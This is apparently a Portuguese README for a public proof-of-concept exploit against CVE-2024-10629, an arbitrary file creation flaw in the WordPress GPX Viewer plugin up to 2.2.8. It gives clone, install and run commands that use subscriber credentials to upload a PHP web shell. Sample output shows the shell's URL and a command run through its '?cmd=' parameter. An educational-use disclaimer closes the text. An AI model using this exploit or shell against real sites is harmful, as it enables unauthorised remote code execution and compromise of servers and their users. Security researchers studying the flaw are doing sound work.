
GPX Viewer <= 2.2.8 - Autenticado (Assinante+) Criação Arbitrária de Arquivos
Este repositório contém uma prova de conceito de exploit para o plugin GPX Viewer para WordPress, que é vulnerável à criação arbitrária de arquivos (CVE-2024-10629). A vulnerabilidade permite que atacantes autenticados com acesso de nível de assinante e superior criem arquivos arbitrários no servidor do site afetado, potencialmente levando à execução remota de código.
O plugin GPX Viewer para WordPress é vulnerável à criação arbitrária de arquivos devido à falta de verificação de capacidade e validação de tipo de arquivo na função gpxv_file_upload() em todas as versões até, e incluindo, 2.2.8. Isso possibilita que atacantes autenticados, com acesso de nível de assinante e superior, criem arquivos arbitrários no servidor do site afetado, o que pode tornar possível a execução remota de código.
requestsClone o repositório:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
Instale a biblioteca necessária:
pip install requests
Execute o exploit:
python exploit.py -u <target_url> -un <username> -p <password>
Substitua <target_url>, <username> e <password> pelos valores apropriados.
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
O script exibirá a versão do plugin e verificará se ele é vulnerável. Em seguida, fará login usando as credenciais fornecidas e tentará fazer o upload do shell. Se bem-sucedido, verificará o upload do shell e executará um comando de exemplo (ls).
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = Mostrar arquivosuname -a = Mostrar informações do sistemaEste exploit é destinado apenas para fins educacionais e testes autorizados. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético. Os autores e colaboradores deste repositório não são responsáveis por qualquer uso indevido ou dano causado por este exploit.
Por: Khaled Alenazi (Nxploit)